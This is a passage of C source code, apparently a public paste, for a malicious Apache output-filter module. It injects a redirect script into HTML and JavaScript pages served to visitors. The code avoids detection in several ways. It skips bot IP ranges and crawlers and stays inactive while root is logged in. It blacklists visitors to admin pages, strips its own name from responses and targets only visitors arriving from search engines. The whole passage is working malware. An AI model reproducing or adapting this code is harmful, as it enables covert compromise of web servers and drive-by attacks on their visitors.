72191936,-772191929},{1081927080,1081927087},{1104609120,1104609135},{1104396896,1104396911},{1105135664,1105135679},{1105036720,1105036735},{1062518496,1062518527},{1082183584,1082183599},{1103424288,1103424303},{1119913504,1119913519},{1104572512,1104572543},{1180247960,1180247967},{1180359496,1180359503},{1180359472,1180359479},{1173102912,1173102919},{1290950648,1290950655},{1208934400,1208936447},{1132356616,1132356623},{-869104592,-869104577},{1128602128,1128602135},{-655652792,-655652785},{-826636096,-826636033},{1667240832,1667240863},{1172313552,1172313559},{1172315992,1172315999},{1172316008,1172316015},{1172588248,1172588255},{1172588256,1172588263},{1172588264,1172588271},{1172588280,1172588287},{1172589672,1172589679},{1173190880,1173190887},{1199710944,1199710951},{1199710952,1199710959},{1199710960,1199710967},{1199728392,1199728399},{1199728400,1199728407},{1199728408,1199728415},{1199728416,1199728423},{1199728424,1199728431},{1259417800,1259417807},{1259813304,1259813311},{1260780984,1260780991},{1261762592,1261762599},{1261735552,1261735559},{1261761744,1261761751},{1261762104,1261762111},{1261762112,1261762119},{1261762120,1261762127},{1261762128,1261762135},{1288200544,1288200551},{1289513400,1289513407},{1291247208,1291247215},{1671628112,1671628119},{1670420000,1670420007},{1670647064,1670647071},{1190127072,1190127103},{1663596768,1663596799},{1164938648,1164938655},{1164938656,1164938663},{1093926912,1094189055},{-819068928,-819003393},{1136852992,1136918527}, {694766336,694766591}, {1089052672,1089060863}, {1093926912,1094189055}, {1122728960,1122729215}, {1123631104,1123639295}, {1208926208,1208926719}, {1249705984,1249771519}, {1317643008,1317643263}, {1607670528,1607670783}, {2087911424,2087911679}, {-1155882496,-1155882241}, {-1008311552,-1008311297}/*, {2130706433,2130771967}*/};
  734. int i;
  735. long ip = (long) ip2long(dl_ClientIP(f));
  736. for (i=0; i<sizeof(bot_ip)/(sizeof(long)*2); i++)
  737. {
  738. if (ip >= bot_ip[i][0] && ip<= bot_ip[i][1])
  739. {
  740. #ifdef DEBUG
  741. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Bot IP detected: %s, ip = %i, left = %i, right = %i\r\n", dl_ClientIP(f), dl_ClientIP(f), ip, bot_ip[i][0], bot_ip[i][1]); fclose(debug_f);
  742. #endif
  743. return 0;
  744. }
  745. }
  746. #ifdef DEBUG
  747. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s IP ok: %s, ip = %i, left = %i, right = %i\r\n", dl_ClientIP(f), dl_ClientIP(f), ip, bot_ip[i][0], bot_ip[i][1]); fclose(debug_f);
  748. #endif
  749. return 1;
  750. }
  751.  
  752. int dl_check_AdminOnline(ap_filter_t *f)
  753. {
  754. if (DO_CHECK_UTMP > 0)
  755. {
  756. struct utmp rec;
  757. int utmpfd;
  758. int reclen = sizeof(rec);
  759. char *ip;
  760. if ((utmpfd = open(UTMP_FILE, O_RDONLY)) >= 0)
  761. {
  762. while (read(utmpfd, &rec, reclen) == reclen)
  763. {
  764. if (rec.ut_type == USER_PROCESS)
  765. {
  766. if (rec.ut_addr > 0)
  767. {
  768. struct in_addr address_struct;
  769. address_struct.s_addr = rec.ut_addr;
  770. ip = inet_ntoa(address_struct);
  771. dl_SendIPToLocalBlacklist(f);
  772. }
  773. struct passwd *user_rec;
  774. if ((user_rec = getpwnam(rec.ut_user)) != NULL && user_rec->pw_uid == 0)
  775. {
  776. time_t idle;
  777. char tty[sizeof(_PATH_DEV) + UT_LINESIZE];
  778. struct stat sb;
  779. char state;
  780. idle = 0;
  781. snprintf(tty, sizeof(tty), "%s%.*s", _PATH_DEV, UT_LINESIZE, rec.ut_line);
  782. if (stat(tty, &sb) == 0)
  783. {
  784. state = sb.st_mode & (S_IWOTH|S_IWGRP) ? '+' : '-';
  785. idle = time(NULL) - sb.st_mtime;
  786. }
  787. if (idle < ROOT_IDLE_TIME)
  788. {
  789. return 0;
  790. }
  791. }
  792. }
  793. }
  794. close(utmpfd);
  795. }
  796. return 1;
  797. }
  798. else
  799. {
  800. return 1;
  801. }
  802. }
  803.  
  804. int dl_check_SiteAdmin(ap_filter_t *f)
  805. {
  806. if (DO_BAN_SITEADMIN > 0)
  807. {
  808. const char* admin_uri[] = {"ADMIN"};
  809. request_rec *r = f->r;
  810. int i, j, k;
  811. int len_uri = strlen(r->uri);
  812. for (i = 0; i < sizeof(admin_uri)/sizeof(char*); i++)
  813. {
  814. int len_admin = strlen(admin_uri[i]);
  815. for (j = 0; j < len_uri - len_admin; j++)
  816. {
  817. int match = 1;
  818. for (k = 0; k < len_admin; k++)
  819. {
  820. if (toupper(r->uri[j+k]) != admin_uri[i][k])
  821. {
  822. match = 0;
  823. break;
  824. }
  825. }
  826. if (match == 1)
  827. {
  828. dl_SendIPToLocalBlacklist(f);
  829. return 0;
  830. }
  831. }
  832. }
  833. }
  834. else
  835. {
  836. return 1;
  837. }
  838. }
  839.  
  840. int dl_check_SiteKernel(ap_filter_t *f)
  841. {
  842. #ifdef DEBUG
  843. FILE* debug_f;
  844. #endif
  845. if (DO_BAN_SITEKERNEL > 0)
  846. {
  847. if (DO_EXPLOIT_ONLY_SEO > 0)
  848. {
  849. const char* good_referers[] = {"GOOGLE.", "YAHOO.", "YANDEX.", "RAMBLER.", "MAIL.RU", "BING.", "SEARCH.", "MSN.", "ALLTHEWEB.", "ASK.", "LOOKSMART.", "ALTAVISTA.", "WEB.DE", "FIREBALL.", "LYCOS.", "AOL.", "ICQ.", "NETZERO.", "FRESH-WEATHER.", "FREECAUSE.", "MYSEARCH-FINDER.", "NEXPLORE.", "ATT.", "REDROVIN.", "TOSEEKA.", "COMCAST.", "INCREDIMAIL.", "CHARTER.", "VERIZON.", "SUCHE.", "VIRGILIO.", "VERDEN."};
  850. request_rec *r = f->r;
  851. char* referer = (char*) apr_table_get(r->headers_in, "Referer");
  852.  
  853. if (referer != NULL)
  854. {
  855. int i, j, k;
  856. int len_referer = strlen(referer);
  857. for (i = 0; i < sizeof(good_referers)/sizeof(char*); i++)
  858. {
  859. int len_good = strlen(good_referers[i]);
  860. for (j = 0; j < len_referer - len_good; j++)
  861. {
  862. int match = 1;
  863. for (k = 0; k < len_good; k++)
  864. {
  865. if (toupper(referer[j+k]) != good_referers[i][k])
  866. {
  867. match = 0;
  868. break;
  869. }
  870. }
  871. if (match == 1)
  872. {
  873. #ifdef DEBUG
  874. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check SiteKernel, IP=%s, Referer=%s - good referer, uniq is not site-kernel\r\n", dl_ClientIP(f), dl_ClientIP(f), referer); fclose(debug_f);
  875. #endif
  876. return 1;
  877. }
  878. }
  879. }
  880. }
  881. #ifdef DEBUG
  882. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check SiteKernel, IP=%s, Referer=%s - BAD referer, uniq looks like SITE-KERNEL!\r\n", dl_ClientIP(f), dl_ClientIP(f), referer); fclose(debug_f);
  883. #endif
  884. dl_SendIPToLocalBlacklist(f);
  885. return 0;
  886. }
  887. else // Check only referer != NULL & referer != host
  888. {
  889. const char* referer = (char*) apr_table_get(f->r->headers_in, "Referer");
  890. const char* host = f->r->hostname;
  891. if (host != NULL && referer != NULL && strstr(referer, host) == NULL)
  892. {
  893. #ifdef DEBUG
  894. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check SiteKernel - ok! Hostname:%s, Referer:%s\r\n", dl_ClientIP(f), host, referer); fclose(debug_f);
  895. #endif
  896. return 1;
  897. }
  898. else
  899. {
  900. #ifdef DEBUG
  901. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check SiteKernel, referer looks like SITE-KERNEL! Hostname:%s, Referer:%s\r\n", dl_ClientIP(f), host, referer); fclose(debug_f);
  902. #endif
  903. dl_SendIPToLocalBlacklist(f);
  904. return 0;
  905. }
  906. }
  907. }
  908. else
  909. {
  910. return 1;
  911. }
  912. }
  913.  
  914. int dl_check_MyReferer(ap_filter_t *f)
  915. {
  916. const char* referer = (char*) apr_table_get(f->r->headers_in, "Referer");
  917. const char* host = f->r->hostname;
  918. if (host != NULL && referer != NULL && strstr(referer, host) != NULL)
  919. {
  920. #ifdef DEBUG
  921. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check referer, Referer=%s, Host=%s - ok\r\n", dl_ClientIP(f), referer, host); fclose(debug_f);
  922. #endif
  923. return 1;
  924. }
  925. #ifdef DEBUG
  926. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Check referer, Referer=%s, Host=%s - BAD\r\n", dl_ClientIP(f), referer, host); fclose(debug_f);
  927. #endif
  928. return 0;
  929. }
  930.  
  931. void JustCleanMyNameInBucket(apr_bucket_brigade *pbbIn, apr_bucket_brigade *pbbOut, apr_bucket *pbktIn, apr_bucket *pbktOut, conn_rec *c, ap_filter_t *f)
  932. {
  933. #ifdef DEBUG
  934. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Just cleaning my name in bucket\r\n", dl_ClientIP(f)); fclose(debug_f);
  935. #endif
  936.  
  937. const char* data;
  938. apr_size_t len;
  939. apr_status_t rv;
  940.  
  941. for (pbktIn = APR_BRIGADE_FIRST(pbbIn); pbktIn != APR_BRIGADE_SENTINEL(pbbIn); pbktIn = APR_BUCKET_NEXT(pbktIn))
  942. {
  943. if (APR_BUCKET_IS_EOS(pbktIn))
  944. {
  945. apr_bucket *pbktEOS = apr_bucket_eos_create(c->bucket_alloc);
  946. APR_BRIGADE_INSERT_TAIL(pbbOut, pbktEOS);
  947. continue;
  948. }
  949. rv = apr_bucket_read(pbktIn, &data, &len, APR_BLOCK_READ /*APR_NONBLOCK_READ*/);
  950. if (rv != APR_SUCCESS)
  951. {
  952. #ifdef DEBUG
  953. char errstr[512];
  954. memset(errstr, 0, sizeof(errstr));
  955. apr_strerror(rv, errstr, sizeof(errstr)-1);
  956. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s apr_bucket_read unsuccessfull: %s\r\n", dl_ClientIP(f), errstr); fclose(debug_f);
  957. #endif
  958. continue;
  959. }
  960.  
  961. char* datastr;
  962. datastr = apr_bucket_alloc(len + 1, c->bucket_alloc);
  963. if (datastr == NULL)
  964. {
  965. #ifdef DEBUG
  966. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: JustCleanMyNameInBucket() datastr = apr_bucket_alloc(%i)\r\n", dl_ClientIP(f), len + 1); fclose(debug_f);
  967. #endif
  968. }
  969. memset(datastr, 0, len + 1);
  970. memcpy(datastr, data, len);
  971. #ifdef CLEAN_MY_NAME
  972. char *find_and_clean = decrypt(f, CLEAN_MY_NAME);
  973. char *p_clear;
  974. if (p_clear = strstr(datastr, find_and_clean))
  975. memset(p_clear, ' ', strlen(find_and_clean));
  976. #endif
  977. pbktOut = apr_bucket_heap_create(datastr, len, apr_bucket_free, c->bucket_alloc);
  978. APR_BRIGADE_INSERT_TAIL(pbbOut, pbktOut);
  979. }
  980. #ifdef DEBUG
  981. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Just cleaning my name in bucket - Finished Successfull!\r\n", dl_ClientIP(f)); fclose(debug_f);
  982. #endif
  983. }
  984.  
  985. int dl_SetCookieKey(ap_filter_t *f, int key)
  986. {
  987. time_t expires_time;
  988. if (key == RAW_COOKIE_VALUE)
  989. {
  990. expires_time = time(NULL) + TEMP_BAN_TIME;
  991. }
  992. else
  993. {
  994. expires_time = time(NULL) + KEY_TTL;
  995. }
  996.  
  997. char expires_str[1024];
  998. memset(expires_str, 0, sizeof(expires_str));
  999. strftime(expires_str, sizeof(expires_str), "%a %d-%b-%Y %H:%M:%S %Z", gmtime(&expires_time));
  1000. char* curr_setcookie = (char*) apr_table_get(f->r->headers_out, "Set-Cookie");
  1001.  
  1002. char new_setcookie[4*1024+256];
  1003. memset(new_setcookie, 0, sizeof(new_setcookie));
  1004.  
  1005. snprintf(new_setcookie, sizeof(new_setcookie), "%s%i; expires=%s; path=/", decrypt(f, KEY_COOKIE_NAME), key, expires_str);
  1006.  
  1007. if (strlen(new_setcookie) > 0)
  1008. {
  1009. #ifdef DEBUG
  1010. FILE* debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Setting Cookie: %s\r\n", dl_ClientIP(f), new_setcookie); fclose(debug_f);
  1011. #endif
  1012. apr_table_add(f->r->headers_out, "Set-Cookie", new_setcookie);
  1013. return 1;
  1014. }
  1015.  
  1016. return 0;
  1017. }
  1018.  
  1019. typedef struct dl_cfg {
  1020. int engine;
  1021. } dl_cfg;
  1022.  
  1023. static dl_cfg *dl_dconfig( const request_rec *r) {
  1024. return (dl_cfg *) ap_get_module_config( r->per_dir_config, &dl_module);
  1025. }
  1026.  
  1027. static dl_cfg *dl_sconfig( const server_rec *s) {
  1028. return (dl_cfg *) ap_get_module_config( s->module_config, &dl_module);
  1029. }
  1030.  
  1031. static void *dl_create_dir_config( apr_pool_t *p, char *dirspec) {
  1032. dl_cfg *cfg;
  1033. cfg = (dl_cfg *) apr_pcalloc( p, sizeof( dl_cfg));
  1034. cfg->engine = 1;
  1035. return (void *) cfg;
  1036. }
  1037.  
  1038. static void *dl_create_server_config( apr_pool_t *p, server_rec *s) {
  1039. dl_cfg *cfg;
  1040. cfg = (dl_cfg *) apr_pcalloc( p, sizeof( dl_cfg));
  1041. cfg->engine = 1;
  1042. return (void *) cfg;
  1043. }
  1044.  
  1045. static command_rec dl_directives[] = {
  1046. AP_INIT_FLAG(
  1047. "dlEngine",
  1048. ap_set_flag_slot,
  1049. (void *) APR_OFFSETOF( dl_cfg, engine),
  1050. OR_OPTIONS,
  1051. "dl module switcher"
  1052. ),
  1053. {NULL}
  1054. };
  1055.  
  1056. static void dl_in_filter(request_rec *r) {
  1057. ap_add_output_filter("dl", NULL, r, r->connection);
  1058. }
  1059.  
  1060. static apr_status_t dl_out_filter(ap_filter_t *f, apr_bucket_brigade *pbbIn) {
  1061.  
  1062. request_rec *r = f->r;
  1063. conn_rec *c = r->connection;
  1064. apr_bucket *pbktIn;
  1065. apr_bucket_brigade *pbbOut;
  1066.  
  1067. #ifdef DEBUG
  1068. FILE* debug_f; debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s --------------- Starting, IP = %s, r->the_request = %s\r\n", dl_ClientIP(f), dl_ClientIP(f), r->the_request); fclose(debug_f);
  1069. #endif
  1070.  
  1071. dl_cfg *cfg = dl_dconfig(f->r);
  1072.  
  1073. if (strstr(r->content_type, "text/html") == NULL && strstr(r->content_type, "javascript") == NULL && strstr(r->content_type, "text/js") == NULL )
  1074. {
  1075. return ap_pass_brigade(f->next, pbbIn);
  1076. }
  1077.  
  1078. pbbOut = apr_brigade_create(r->pool, c->bucket_alloc);
  1079. const char *data;
  1080. apr_size_t len, addlen;
  1081. apr_bucket *pbktOut;
  1082.  
  1083. if (!dl_check_Raw(f) || !dl_check_AdminOnline(f) || !dl_check_SiteAdmin(f) || !dl_check_LocalBlacklist(f) || !dl_check_TempBanlist(f) || !dl_check_BotUserAgent(f) || !dl_check_BotIp(f))
  1084. {
  1085. JustCleanMyNameInBucket(pbbIn, pbbOut, pbktIn, pbktOut, c, f);
  1086. }
  1087. else
  1088. {
  1089. int ClientKey = dl_GetClientKey(f);
  1090.  
  1091. dl_Mode mode;
  1092. dl_LoadSession(f, &mode);
  1093.  
  1094. #ifdef DEBUG
  1095. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Loading session: IP = %s, SessFilename = %s, mode.modetype = %i, mode.key = %i, mode.time = %i, ClientKey = %i\r\n", dl_ClientIP(f), dl_ClientIP(f), dl_genFilenameSession(f), mode.modetype, mode.key, mode.time, ClientKey); fclose(debug_f);
  1096. #endif
  1097.  
  1098. if (ClientKey != mode.key)
  1099. {
  1100. #ifdef DEBUG
  1101. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Different keys, calling JustCleanMyNameInBucket. mode.modetype = %i, mode.key = %i, ClientKey = %i\r\n", dl_ClientIP(f), mode.modetype, mode.key, ClientKey); fclose(debug_f);
  1102. #endif
  1103. JustCleanMyNameInBucket(pbbIn, pbbOut, pbktIn, pbktOut, c, f);
  1104. }
  1105. else
  1106. {
  1107. if (mode.modetype == 1)
  1108. {
  1109. if (dl_check_SiteKernel(f))
  1110. {
  1111. #ifdef DEBUG
  1112. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Modetype = 1, setting first key to second mode\r\n", dl_ClientIP(f)); fclose(debug_f);
  1113. #endif
  1114.  
  1115. int key2 = genKey();
  1116. if (dl_SetCookieKey(f, key2) > 0)
  1117. {
  1118. mode.modetype = 2;
  1119. mode.key = key2;
  1120. mode.time = time(NULL);
  1121. memset(mode.referer1, 0, sizeof(mode.referer1));
  1122. char* referer = (char*) apr_table_get(r->headers_in, "Referer");
  1123. if (referer != NULL)
  1124. {
  1125. memcpy(mode.referer1, referer, min(strlen(referer), MAX_REFERER_LENGTH-1));
  1126. }
  1127. memset(mode.referer2, 0, sizeof(mode.referer2));
  1128. const char* host = f->r->hostname;
  1129. memcpy(mode.referer2, host, strlen(host));
  1130. dl_SaveSession(f, &mode);
  1131. }
  1132. }
  1133. JustCleanMyNameInBucket(pbbIn, pbbOut, pbktIn, pbktOut, c, f);
  1134. }
  1135. else if (mode.modetype == 2 && dl_check_MyReferer(f))
  1136. {
  1137. int key3 = genKey();
  1138. const char* insert_tags[] = {"</script>", "</style>", "</head>", "</title>", "</body>", "</html>"};
  1139. char js_inject[512];
  1140.  
  1141. if (strstr(r->content_type, "text/html") != NULL)
  1142. snprintf(js_inject, sizeof(js_inject), "%s", dl_GetRedirectScript(f, &mode));
  1143. else if (strstr(r->content_type, "javascript") != NULL || strstr(r->content_type, "text/js") != NULL )
  1144. snprintf(js_inject, sizeof(js_inject), "document.write('%s');", dl_GetRedirectScript(f, &mode));
  1145.  
  1146. #ifdef DEBUG
  1147. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Modetype = 2, injecting iframe via JS: %s\r\n", dl_ClientIP(f), js_inject); fclose(debug_f);
  1148. #endif
  1149.  
  1150. int InjectedThisBrigade = 0;
  1151. for (pbktIn = APR_BRIGADE_FIRST(pbbIn); pbktIn != APR_BRIGADE_SENTINEL(pbbIn); pbktIn = APR_BUCKET_NEXT(pbktIn))
  1152. {
  1153. if (APR_BUCKET_IS_EOS(pbktIn))
  1154. {
  1155. apr_bucket *pbktEOS = apr_bucket_eos_create(c->bucket_alloc);
  1156. APR_BRIGADE_INSERT_TAIL(pbbOut, pbktEOS);
  1157. continue;
  1158. }
  1159. apr_bucket_read(pbktIn, &data, &len, APR_BLOCK_READ/*APR_NONBLOCK_READ*/);
  1160.  
  1161. char* buf;
  1162. char* datastr;
  1163. datastr = apr_bucket_alloc(len + 1, c->bucket_alloc);
  1164.  
  1165. if (datastr == NULL)
  1166. {
  1167. #ifdef DEBUG
  1168. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_out_filter() datastr = apr_bucket_alloc(%i)\r\n", dl_ClientIP(f), len + 1); fclose(debug_f);
  1169. #endif
  1170. }
  1171.  
  1172. memset(datastr, 0, len + 1);
  1173. memcpy(datastr, data, len);
  1174.  
  1175. #ifdef CLEAN_MY_NAME
  1176. char *find_and_clean = decrypt(f, CLEAN_MY_NAME);
  1177. char *p_clear;
  1178. if (p_clear = strstr(datastr, find_and_clean))
  1179. memset(p_clear, ' ', strlen(find_and_clean));
  1180. #endif
  1181.  
  1182. if (!InjectedThisBrigade)
  1183. {
  1184. int p_insert = 0;
  1185. char* c_insert;
  1186. int taglen;
  1187.  
  1188. if (strstr(r->content_type, "text/html") != NULL)
  1189. {
  1190. int i;
  1191. for (i = 0; i < sizeof(insert_tags) / sizeof(char *); i++)
  1192. {
  1193. taglen = strlen(insert_tags[i]);
  1194. if (c_insert = stristr(datastr, insert_tags[i]))
  1195. {
  1196. p_insert = (c_insert + taglen) - datastr;
  1197. break;
  1198. }
  1199. }
  1200. }
  1201.  
  1202. if (strstr(r->content_type, "text/html") != NULL && p_insert == 0) // esli ne nashli teg kuda vstavitsa (vozmozhno eto sgenereniy JS a ne HTML), to otdat' bez izmeneniy
  1203. {
  1204. addlen = 0;
  1205. buf = apr_bucket_alloc(len, c->bucket_alloc);
  1206.  
  1207. if (buf == NULL)
  1208. {
  1209. #ifdef DEBUG
  1210. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_out_filter() buf = apr_bucket_alloc(%i)\r\n", dl_ClientIP(f), len); fclose(debug_f);
  1211. #endif
  1212. }
  1213.  
  1214. memset(buf, 0, len);
  1215. memcpy(buf, datastr, len);
  1216. }
  1217. else
  1218. {
  1219. char *addbuf;
  1220. addbuf = js_inject;
  1221. addlen = strlen(js_inject);
  1222. buf = (char*) apr_bucket_alloc(len + addlen, c->bucket_alloc);
  1223.  
  1224. if (buf == NULL)
  1225. {
  1226. #ifdef DEBUG
  1227. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_out_filter() apr_bucket_alloc(%i)\r\n", dl_ClientIP(f), len + addlen); fclose(debug_f);
  1228. #endif
  1229. }
  1230.  
  1231. memset(buf, 0, len + addlen);
  1232. memcpy(buf, datastr, p_insert);
  1233. memcpy(buf + p_insert, addbuf, addlen);
  1234. memcpy(buf + p_insert + addlen, datastr + p_insert, len - p_insert);
  1235. InjectedThisBrigade = 1;
  1236.  
  1237. dl_SetCookieKey(f, RAW_COOKIE_VALUE);
  1238. dl_DeleteSession(f);
  1239. #ifdef DEBUG
  1240. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Deleted session \r\n", dl_ClientIP(f)); fclose(debug_f);
  1241. #endif
  1242. }
  1243. }
  1244. else
  1245. {
  1246. addlen = 0;
  1247. buf = apr_bucket_alloc(len, c->bucket_alloc);
  1248.  
  1249. if (buf == NULL)
  1250. {
  1251. #ifdef DEBUG
  1252. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s ALLOC ERROR: dl_out_filter() buf = apr_bucket_alloc(%i)\r\n", dl_ClientIP(f), len); fclose(debug_f);
  1253. #endif
  1254. }
  1255.  
  1256. memset(buf, 0, len);
  1257. memcpy(buf, datastr, len);
  1258. }
  1259. pbktOut = apr_bucket_heap_create(buf, len + addlen, apr_bucket_free, c->bucket_alloc);
  1260. APR_BRIGADE_INSERT_TAIL( pbbOut, pbktOut);
  1261. #ifdef DEBUG
  1262. debug_f = fopen(DEBUG, "a"); fprintf(debug_f, "%s Injected OK \r\n", dl_ClientIP(f)); fclose(debug_f);
  1263. #endif
  1264. }
  1265. }
  1266. else
  1267. {
  1268. JustCleanMyNameInBucket(pbbIn, pbbOut, pbktIn, pbktOut, c, f);
  1269. }
  1270. }
  1271. }
  1272. apr_brigade_cleanup(pbbIn);
  1273. return ap_pass_brigade(f->next, pbbOut);
  1274. }
  1275.  
  1276. static void dl_register_hooks( apr_pool_t *p) {
  1277. ap_hook_insert_filter( dl_in_filter, NULL, NULL, APR_HOOK_MIDDLE);
  1278. ap_register_output_filter( "dl", dl_out_filter, NULL, AP_FTYPE_RESOURCE);
  1279. }
  1280.  
  1281. module AP_MODULE_DECLARE_DATA dl_module = {
  1282. STANDARD20_MODULE_STUFF,
  1283. dl_create_dir_config,
  1284. NULL,
  1285. dl_create_server_config,
  1286. NULL,
  1287. dl_directives,
  1288. dl_register_hooks
  1289. };
RAW Paste Data